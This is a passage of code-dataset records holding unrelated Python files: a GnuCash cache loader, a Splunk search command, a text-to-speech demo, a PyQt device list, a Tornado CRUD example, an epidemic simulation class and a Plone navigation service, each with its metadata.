load_cache(cachepath, mtime):\n if not os.path.exists(cachepath):\n return False\n # Do not use the cache if the gnucash file is newer\n if mtime >= os.path.getmtime(cachepath):\n return False\n with open(cachepath, \"r\") as f:\n current_commit_name = get_commit_name()\n try:\n cached_commit_name, gcf = cPickle.load(f)\n if cached_commit_name != current_commit_name:\n return False\n print(\"loaded cache %s\" % cachepath)\n return gcf\n except Exception as e:\n warn(\"Failed to load pickled cache of Gnucash file \"\n \"'%s': %s\" % (cachepath, repr(e)))\n return False\n\n\ndef update_cache(cachepath, gcf):\n if sys.getrecursionlimit() < 2000:\n sys.setrecursionlimit(2000)\n with open(cachepath, \"w\") as f:\n try:\n cPickle.dump((get_commit_name(), gcf), f)\n except 
RuntimeError as e:\n warn(\"\"\"Failed to dump a pickled version of the \\\ngnucash file \"%s\" due to the RuntimeError below. If this is a stack \\\noverflow, you might want to increase the maximum recursion depth by \\\nsys.setrecursionlimit.\"\"\")\n raise e\n\n\ndef parse_gcf(f, mtime, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is not None:\n result = load_cache(cachepath, mtime)\n if result:\n return result\n handler = SaxHandler(scheme)\n parse(f, handler)\n result = handler.result\n result.mtime = mtime\n update_cache(cachepath, result)\n return result\n\n\ndef open_gcf(filepath, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is None:\n cachepath = cache_path(filepath)\n with open(filepath) as f:\n return parse_gcf(f, os.path.getmtime(filepath),\n scheme=scheme, parse=parse, cachepath=cachepath)\n\n\ndef open_yaml(path):\n with open(path) as f:\n d = yaml.load(f)\n\n dirname = os.path.dirname(path)\n gcf_path = os.path.join(dirname, d['path'])\n cache_path = None\n if \"cache\" in d:\n cache_path = os.path.join(dirname, d['cache'])\n gcf = None\n if 'repo' in d:\n repo_path = os.path.join(dirname, d['repo'])\n gcf = open_gcf_in_git_repo(repo_path, d['path'], cachepath=cache_path)\n else:\n gcf = open_gcf(gcf_path, cachepath=cache_path)\n if 'meta' in d:\n gcf.meta = d['meta']\n\n return gcf\n", "sub_path": "sm/gnucash/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "git.Repo", "line_number": 16, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 33, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 50, "usage_type": "call"}, {"api_name": "lxml.sax.saxify", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.getrecursionlimit", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 88, "usage_type": "call"}, {"api_name": "cPickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 93, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 100, "usage_type": "name"}, {"api_name": "koert.gnucash.xmlformat.SaxHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 117, 
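Editor's note: tools.py above guards its pickle cache with both the source file's mtime and the current git commit. A compact Python 3 sketch of the same check follows; the function and argument names are illustrative only. Note that Python 3's pickle needs binary file modes, unlike the 'r'/'w' text modes in the Python 2 code above.

import os
import pickle

def load_cached(cache_path, source_mtime, version_key):
    # Reuse the cache only if it is newer than the source file and was
    # written by the same code version (here: a git commit hash).
    if not os.path.exists(cache_path):
        return None
    if source_mtime >= os.path.getmtime(cache_path):
        return None
    with open(cache_path, "rb") as f:  # pickle requires binary mode
        try:
            cached_key, payload = pickle.load(f)
        except Exception:
            return None
    return payload if cached_key == version_key else None

def update_cached(cache_path, payload, version_key):
    with open(cache_path, "wb") as f:
        pickle.dump((version_key, payload), f)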
"usage_type": "attribute"}, {"api_name": "os.path", "line_number": 117, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}]} +{"seq_id": "190884705", "text": "import sys\nimport json\nfrom splunklib.searchcommands import dispatch, StreamingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Fieldname\nimport environment_data\n\n\n@Configuration(local=True)\nclass EnvironmentInstancesUpdateState(StreamingCommand):\n\n state_field = Option(validate=Fieldname())\n name_field = Option(validate=Fieldname())\n\n def stream(self, instances):\n for instance in instances:\n environment_id = instance[\"environment_id\"]\n instance_state = instance[self.state_field]\n instance_name = instance[self.name_field]\n\n self.service.post(\"/services/msaas/environments/%s/instances/%s\" % (environment_id, instance_name), body=json.dumps({\n \"state\": instance_state,\n }))\n # environment_data.update_instance(\n # self.service, environment_id, instance_name,\n # instance_state=instance_state)\n yield instance\n\ndispatch(EnvironmentInstancesUpdateState,\n sys.argv, sys.stdin, sys.stdout, __name__)\n", "sub_path": "apps/msaas/bin/environment_instances_update_state_command.py", "file_name": "environment_instances_update_state_command.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "splunklib.searchcommands.StreamingCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 12, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Configuration", "line_number": 8, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.dispatch", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "210347852", "text": "import os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = './config/My Project-bd8af4dfa881.json'\nfrom google.cloud import texttospeech\nimport base64\nimport subprocess\nfrom pydub import 
AudioSegment\nfrom pydub.playback import play\nimport io\n\n\n\ndef create_google_sst(text):\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n voice = texttospeech.types.VoiceSelectionParams(\n name=\"en-US-Wavenet-F\",\n language_code='en-US', \n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE\n )\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n pitch=2.0,\n speaking_rate=1.26\n )\n \n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n audio = base64.b64decode(response.audio_content)\n\n song = AudioSegment.from_file(io.BytesIO(audio), format=\"mp3\")\n play(song)\n\ncreate_google_sst(\"how can I help you ?\")", "sub_path": "scrath.py", "file_name": "scrath.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech.TextToSpeechClient", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech", "line_number": 13, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.SynthesisInput", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 14, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 14, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.VoiceSelectionParams", "line_number": 15, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 15, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 18, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 18, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.AudioConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 20, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 21, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 21, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 27, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 29, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "620220901", "text": "import sys, subprocess\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QTreeWidget, QTreeWidgetItem, QGroupBox, QPushButton, QApplication\nfrom PyQt5 import QtCore\n\nclass MyApp(object): \n def __init__(self):\n super(MyApp, self).__init__() \n self.mainWidget = QWidget()\n self.mainLayout = QVBoxLayout()\n self.mainWidget.setLayout(self.mainLayout)\n\n self.hLayout = QHBoxLayout()\n self.mainLayout.insertLayout(0, self.hLayout)\n\n\n self.listA=QTreeWidget()\n self.listA.setColumnCount(3)\n self.listA.setHeaderLabels(['Checkbox','Name','Data'])\n for i in range(3):\n item=QTreeWidgetItem()\n item.setCheckState(0, 2)\n item.setText(1, 'Item '+str(i))\n 
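Editor's note: in recent google-cloud-texttospeech clients, response.audio_content is already raw MP3 bytes, so the base64.b64decode call in scrath.py above may be unnecessary (the base64 step belongs to the REST API, not the Python client); treat that as an assumption to verify against your client version. The pydub playback itself needs no temp file. A minimal sketch, assuming mp3_bytes holds the synthesized audio:

import io
from pydub import AudioSegment
from pydub.playback import play

def play_mp3_bytes(mp3_bytes):
    # pydub accepts any file-like object, so the TTS payload can be
    # decoded and played straight from memory.
    segment = AudioSegment.from_file(io.BytesIO(mp3_bytes), format="mp3")
    play(segment)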
item.setData(2, 256, id(item) )\n item.setText(2, str(id(item) ) )\n self.listA.addTopLevelItem(item)\n\n self.hLayout.addWidget(self.listA)\n\n self.buttonGroupbox = QGroupBox()\n self.buttonlayout = QVBoxLayout()\n self.buttonGroupbox.setLayout(self.buttonlayout)\n\n okButton = QPushButton('Remove Selected')\n okButton.clicked.connect(self.removeSel)\n self.buttonlayout.addWidget(okButton)\n\n getDataButton = QPushButton('Get Items Data')\n getDataButton.clicked.connect(self.getItemsData)\n self.buttonlayout.addWidget(getDataButton)\n\n self.mainLayout.addWidget(self.buttonGroupbox)\n self.mainWidget.show()\n sys.exit(app.exec_())\n\n def removeSel(self):\n listItems = []\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n print(\"item\", item)\n if (item.checkState(0) == 2):\n listItems.append(item)\n\n print(\"listItems: \",listItems)\n\n for item in listItems:\n print(\"item: \", item)\n itemIndex=self.listA.indexOfTopLevelItem(item)\n print(\"itemIndex\", itemIndex)\n self.listA.takeTopLevelItem(itemIndex)\n print('\\n\\t Number of items remaining', self.listA.topLevelItemCount())\n\n def getItemsData(self):\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n itmData=item.data(2, 256)\n print('\\n\\t Item Id Stored as Item Data:', itmData, 'Item Checkbox State:', item.checkState(0))\n\nif __name__ == '__main__':\n what = subprocess.Popen(['adb', 'devices', '-l'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, errs = what.communicate()\n out = str(out, 'utf-8')\n outs = out.split()\n del outs[0:4]\n length = len(outs)\n n = length/6\n struct = [[] for i in range(int(n))]\n for i in range(int(n)):\n print(n, i)\n struct[i] = outs[i*6:(i+1)*6]\n print(struct[i])\n app = QApplication(sys.argv)\n MyApp()", "sub_path": "PythGUI/gui2.py", "file_name": "gui2.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": "attribute"}]} +{"seq_id": "617248015", "text": "import tornado.ioloop\nimport tornado.web\nimport psycopg2.extras\nimport notorm\nimport tornado.autoreload\n\nclass Game(notorm.record):\n _fields = {'id':None,\n 'name':None\n }\n\n insert_qry = \"\"\"\n insert into game (name)\n values(%(name)s)\n returning id\n \"\"\"\n\n update_qry = \"\"\"\n update game set name=%(name)s where id = 
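Editor's note: the magic numbers in the tree setup above are named Qt constants; setCheckState(0, 2) is Qt.Checked and role 256 is Qt.UserRole. A small sketch using the named constants (the payload value is illustrative):

import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QTreeWidgetItem

app = QApplication(sys.argv)        # Qt requires an application object
item = QTreeWidgetItem()
item.setCheckState(0, Qt.Checked)   # equivalent to setCheckState(0, 2)
item.setData(2, Qt.UserRole, {'pid': 1234})  # same role as the 256 above
print(item.data(2, Qt.UserRole), item.checkState(0) == Qt.Checked)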
%(id)s\n \"\"\"\n\n @classmethod\n def get(cls, game_id):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game where id = %(game_id)s\"\"\",\n {'game_id': game_id})\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n if not games:\n return None\n return games[0]\n\n @classmethod\n def get_all(cls):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game order by name\"\"\")\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n return games\n\nclass GameComposite(psycopg2.extras.CompositeCaster):\n def make(self, values):\n d = dict(zip(self.attnames, values))\n return Game(**d)\n\nclass ExampleRequestHandler(tornado.web.RequestHandler):\n def on_finish(self):\n notorm.db.commit()\n\n def log_exception(self, typ, value, tb):\n print(\"Exception\")\n notorm.db.rollback()\n return super(ExampleRequestHandler, self).log_exception(typ, value, tb)\n\nclass MainHandler(ExampleRequestHandler):\n def get(self):\n games = Game.get_all()\n self.render(\"../main.html\", games=games)\n\nclass GameHandler(ExampleRequestHandler):\n def get(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n self.render(\"../edit.html\", game=game)\n\n def post(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n game.name = self.get_argument('name')\n game.save()\n self.redirect(\"/\")\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/game/new\", GameHandler),\n (r\"/game/([0-9]+)\", GameHandler)\n ])\n\nif __name__ == \"__main__\":\n notorm.db = psycopg2.connect(\"dbname=notorm_example user=dbuser\")\n\n cursor = notorm.db.cursor()\n psycopg2.extras.register_composite('game', cursor, globally=True, factory = GameComposite)\n app = make_app()\n app.listen(8888)\n tornado.autoreload.start(tornado.ioloop.IOLoop.current())\n tornado.ioloop.IOLoop.current().start()", "sub_path": "examples/tornadosync/tornadosync.py", "file_name": "tornadosync.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "notorm.record", "line_number": 7, "usage_type": "attribute"}, {"api_name": "notorm.db.cursor", "line_number": 24, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 24, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 29, "usage_type": "call"}, {"api_name": "notorm.db.cursor", "line_number": 36, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 36, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 40, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 43, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 48, "usage_type": "name"}, {"api_name": "notorm.db.commit", "line_number": 
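Editor's note: the CompositeCaster pattern used above is what lets "select game.*::game" come back as Game objects instead of raw tuples. A minimal standalone sketch of the same mechanism; the DSN and table are assumed to match the example above, and the factory here returns plain dicts for clarity:

import psycopg2
import psycopg2.extras

class DictComposite(psycopg2.extras.CompositeCaster):
    # make() receives the composite's values; attnames carries the
    # column names of the registered composite type.
    def make(self, values):
        return dict(zip(self.attnames, values))

conn = psycopg2.connect("dbname=notorm_example user=dbuser")  # assumed DSN
cur = conn.cursor()
psycopg2.extras.register_composite('game', cur, globally=True,
                                   factory=DictComposite)
cur.execute("select game.*::game from game")
print(cur.fetchall())  # each row's 'game' column now arrives as a dict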
50, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 50, "usage_type": "attribute"}, {"api_name": "notorm.db.rollback", "line_number": 54, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.web.Application", "line_number": 80, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 80, "usage_type": "name"}, {"api_name": "notorm.db", "line_number": 87, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 87, "usage_type": "name"}, {"api_name": "notorm.db.cursor", "line_number": 89, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras.register_composite", "line_number": 90, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 90, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 90, "usage_type": "name"}, {"api_name": "tornado.ioloop.autoreload.start", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.autoreload", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 93, "usage_type": "name"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 94, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "545420405", "text": "import random\nfrom datetime import datetime, timedelta\n\nfrom Person import Person\n\n\nclass Place:\n\n def __init__(self, place_info):\n self.population = set()\n self.place_info = place_info # (40.760265, -73.989105, 'Italian', '217', '291', 'Ristorante Da Rosina')\n self.time_to_recover = 14\n self.total_infected_number = 0\n self.immune_population = set()\n\n def get_population(self):\n return self.population\n\n def get_total_infected(self):\n return self.total_infected_number\n\n def set_population(self, new_population):\n self.population = new_population\n\n def set_total_movements(self, number):\n self.total_movements = number\n self.init_population(self.total_movements) # initilise population according to place popularity\n\n def init_population(self, number):\n start_time = datetime(2010, 12, 21, 20, 0, 0)\n for i in range(number):\n person = Person()\n # infect with a certain probability\n if random.random() <= 0.001:\n person.set_infected(start_time)\n self.add_person(person)\n\n def get_total_movements(self):\n return self.total_movements\n\n def add_person(self, person):\n self.population.add(person)\n\n def incubate_cycle(self, current_time_o):\n ''' Process local population at a place and yield a new cycle of infections '''\n\n # set recovered timedelta(days=1): set time_to_recover, current_time\n infected_pop = [p for p in self.population if p.get_status() == 1]\n recovered_pop = [p.set_immune(current_time_o) for p in infected_pop if\n current_time_o - p.get_time_infected() > timedelta(days=self.time_to_recover)]\n infected_pop = set(infected_pop).difference(recovered_pop) # infected pop - recovered\n # print (len(infected_pop))\n # print 
(len(recovered_pop))\n # print (len(self.population))\n # print ('----')\n\n # calculate number of infected people\n total_infected = len(infected_pop)\n # if total_infected == 0:\n # \t#if there is no infected person at place, no one else can be infected (ie do not execute code below)\n # \treturn\n\n total_pop = len(self.population)\n\n # calculate susceptible to infection\n susceptible_pop = self.population.difference(infected_pop)\n susceptible_pop = susceptible_pop.difference(self.immune_population)\n self.immune_population = self.immune_population.union(recovered_pop)\n\n # calculate probability of infection\n if total_pop == 0:\n prob_infection = 0.0\n else:\n prob_infection = total_infected / total_pop\n\n # calculate newly infected number\n newly_infected_num = int(len(susceptible_pop) * prob_infection)\n\n # set newly infected persons accordingly\n newly_infected_pop = random.choices(tuple(susceptible_pop), k=newly_infected_num)\n for i in range(newly_infected_num):\n newly_infected_pop[i].set_infected(current_time_o)\n\n # count number infected\n self.total_infected_number = len(infected_pop) + newly_infected_num\n\n def set_recovered(self):\n ''' Process local population and yield a new cycle of recoveries (death case will be added later)'''\n pass\n", "sub_path": "Place.py", "file_name": "Place.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "Person.Person", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "541244773", "text": "from Acquisition import aq_parent\nfrom ftw.solr.interfaces import ISolrSearch\nfrom ftw.solr.query import make_filters\nfrom opengever.base.browser.navigation import make_tree_by_url\nfrom opengever.base.interfaces import IOpengeverBaseLayer\nfrom opengever.base.solr import OGSolrDocument\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryfolder import REPOSITORY_FOLDER_STATE_INACTIVE\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.contentlisting.interfaces import IContentListingObject\nfrom plone.restapi.interfaces import IExpandableElement\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.services import Service\nfrom Products.CMFPlone.interfaces.siteroot import IPloneSiteRoot\nfrom zExceptions import BadRequest\nfrom zope.component import adapter\nfrom zope.component import getUtility\nfrom zope.dottedname.resolve import resolve\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\n\n@implementer(IExpandableElement)\n@adapter(Interface, IOpengeverBaseLayer)\nclass Navigation(object):\n\n FIELDS = [\n 'UID',\n 'path',\n 'portal_type',\n 'review_state',\n 'Title',\n 'title_de',\n 'title_en',\n 'title_fr',\n 'Description',\n 'filename',\n 'has_sametype_children',\n 'is_subdossier',\n 'dossier_type',\n ]\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.solr = getUtility(ISolrSearch)\n\n def __call__(self, expand=False):\n root_interface = self.get_root_interface()\n content_interfaces = self.get_content_interfaces()\n\n if 
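Editor's note: one numeric walk-through of the probability step in incubate_cycle above, plus a sampling caveat (the values are illustrative):

# 3 infected among 12 people present gives each susceptible visitor an
# infection probability of 3/12 = 0.25, so int(8 * 0.25) = 2 new cases.
total_infected, total_pop, susceptible = 3, 12, 8
newly_infected = int(susceptible * (total_infected / total_pop))
print(newly_infected)  # -> 2

# Caveat: random.choices samples WITH replacement, so the cycle above can
# pick the same person twice; random.sample draws distinct people and is
# likely closer to the intent.
import random
print(random.sample(range(8), k=newly_infected))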
self.request.form.get('include_root'):\n content_interfaces.append(root_interface)\n\n result = {\n 'navigation': {\n '@id': '{}/@navigation'.format(self.context.absolute_url()),\n },\n }\n\n if not expand:\n return result\n\n root = self.find_root(root_interface, content_interfaces)\n solr_docs = self.query_solr(root, content_interfaces)\n\n nodes = map(self.solr_doc_to_node, solr_docs)\n result['navigation']['tree'] = make_tree_by_url(nodes)\n\n return result\n\n def find_root(self, root_interface, content_interfaces):\n context = self.context\n\n if root_interface not in content_interfaces:\n while (not root_interface.providedBy(context)\n and not IPloneSiteRoot.providedBy(context)):\n context = aq_parent(context)\n else:\n # This happens i.e. on lookup a dossier tree from a subdossier.\n #\n # The current context is the subdossier which is also\n # providing the root_interface. We have to get sure, that we return\n # the most upper object providing the given root_interface if\n # the root_interface is within `content_interfaces`\n current = context\n while (not IPloneSiteRoot.providedBy(current)):\n if root_interface.providedBy(current):\n context = current\n current = aq_parent(current)\n\n if root_interface.providedBy(context):\n root = context\n else:\n response = self.solr.search(\n filters=make_filters(\n object_provides=root_interface.__identifier__),\n sort='path asc',\n fl=[\"path\"],\n )\n roots = [OGSolrDocument(d) for d in response.docs]\n\n if roots:\n root = roots[0].getObject()\n else:\n raise BadRequest(\"No root found for interface: {}\".format(\n root_interface.__identifier__))\n return root\n\n def query_solr(self, root, content_interfaces):\n query = {\n 'object_provides': [i.__identifier__ for i in content_interfaces],\n 'path_parent': '/'.join(root.getPhysicalPath()),\n 'trashed': 'false',\n }\n\n review_states = self.request.form.get('review_state', [])\n if review_states:\n query['review_state'] = review_states\n\n filters = make_filters(**query)\n\n if self.request.form.get('include_context'):\n # Include context branch's UIDs in the query, by adding them as\n # a filter that is OR'ed with the main filters (which themselves\n # are AND'ed together). 
This is necessary because restrictions\n # from the main filters must not be applied to the context branch.\n context_uids = list(self.get_context_branch_uids(root))\n if context_uids:\n context_filter = make_filters(UID=context_uids)[0]\n main_filters = self._join_filters(make_filters(**query), 'AND')\n filters = self._join_filters([main_filters, context_filter], 'OR')\n\n resp = self.solr.search(\n filters=filters,\n sort='sortable_title asc',\n rows=10000,\n fl=self.FIELDS)\n\n return [OGSolrDocument(doc) for doc in resp.docs]\n\n def get_context_branch_uids(self, root):\n \"\"\"Return UIDs of the current context's chain up to the root.\n \"\"\"\n for item in self.context.aq_chain:\n item_uid = item.UID()\n if item_uid == root.UID():\n break\n yield item_uid\n\n def _lookup_iface_by_identifier(self, identifier):\n return resolve(identifier) if identifier else None\n\n def _join_filters(self, filters, op):\n op = ' %s ' % op\n return op.join(['(%s)' % flt for flt in filters])\n\n def get_root_interface(self):\n \"\"\"Lookups the root_interface provided within the request parameter.\n\n This interface is used as the navigation root identifier.\n \"\"\"\n interface = self.request.form.get('root_interface')\n try:\n return self._lookup_iface_by_identifier(\n interface) or IRepositoryRoot\n except ImportError:\n raise BadRequest(\"The provided `root_interface` could not be \"\n \"looked up: {}\".format(interface))\n\n def get_content_interfaces(self):\n \"\"\"Lookups the content_interfaces provided within the request parameter.\n\n The interfaces provided in `content_interfaces` are used as navigation\n items.\n \"\"\"\n interfaces = self.request.form.get('content_interfaces')\n if not interfaces:\n return [IRepositoryFolder]\n\n if not isinstance(interfaces, list):\n interfaces = [interfaces]\n\n content_interfaces = []\n for interface in interfaces:\n try:\n content_interfaces.append(\n 